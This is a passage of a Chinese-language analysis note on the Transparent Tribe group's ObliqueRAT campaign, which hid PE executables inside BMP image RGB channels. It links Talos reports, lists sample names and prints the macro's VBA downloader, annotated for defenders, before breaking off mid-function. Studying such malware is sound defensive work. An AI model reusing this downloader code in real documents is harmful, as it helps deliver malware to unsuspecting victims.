透明部落通过BMP的RGB通道隐藏PE数据
- 报告和样本
- [《Transparent Tribe APT expands its Windows malware arsenal》](https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html)
- [《ObliqueRAT returns with new campaign using hijacked websites》](https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html)
- [《ObliqueRAT: New RAT hits victims' endpoints via malicious documents》](https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html)
- 样本
- 知识扩展:图片隐写
报告和样本
《Transparent Tribe APT expands its Windows malware arsenal》
没什么技术分析,主要是描述战术和趋势
《ObliqueRAT returns with new campaign using hijacked websites》
有描述宏代码,以及RAT的更新
《ObliqueRAT: New RAT hits victims’ endpoints via malicious documents》
内容为ObliqueRAT分析,也可以看看
样本
theta.bmp
camela.bmp
merj.bmp
宏代码
DownloadBackground:下载图片
BackgroundStretch:读取BMP图片保存为xls
BackgroundSize:将字符串Letter(ASC)转为OrderByte(Byte)
'下载图片
Sub DownloadBackground(url As String, filePath As String)
' Fetch url with a synchronous HTTP GET (Microsoft.XMLHTTP) and write the raw response body
' to filePath through an ADODB.Stream. Up to 4 attempts are made: On Error sends every
' runtime error back to the TryAgain label, which decrements attempts before retrying.
' The Sub reports no outcome; it simply ends once a 200 response is saved or attempts reach 0.
' For defenders, the observable sequence is an Office process making an MSXML GET and then
' creating a file via ADODB.Stream - the host-side pattern of this downloader stage.
Dim WinHttpReq As Object, attempts As Integer
attempts = 4
On Error GoTo TryAgain
TryAgain:
' Reached once on the normal path and again after each trapped error (attempts counts down).
' NOTE(review): VBA stays in error-handling mode after the first jump because no Resume is
' executed, so a second error may propagate to the caller instead of retrying - confirm.
attempts = attempts - 1
Err.Clear
If attempts > 0 Then
Set WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")
WinHttpReq.Open \"GET\", url, False    ' False = synchronous; the macro blocks until the reply arrives
WinHttpReq.send
If WinHttpReq.Status = 200 Then
' Themeream is never declared with Dim; presumably an implicit Variant (no Option Explicit visible here).
Set Themeream = CreateObject(\"ADODB.Stream\")
Themeream.Open
Themeream.Type = 1    ' binary stream, so the downloaded BMP bytes are written unmodified
Themeream.Write WinHttpReq.responseBody
Themeream.SaveToFile filePath, 1    ' 1 = adSaveCreateNotExist: raises an error if filePath already exists
Themeream.Close
End If
End If
End Sub
'PE文件大小
Private Function BackgroundSize(ByVal ProtectString As String) As Byte()
Dim Nibbles() As Byte
Dim ProtectPos As Long
Dim ProtectDigit As Long
Dim CursorLen As Long
Dim Numeris As Long
ReDim Nibbles(Len(ProtectString) \\ 2)
For ProtectPos = 1 To Len(ProtectString)
ProtectDigit = InStr(\"0123456789ABCDEF\", _
UCase$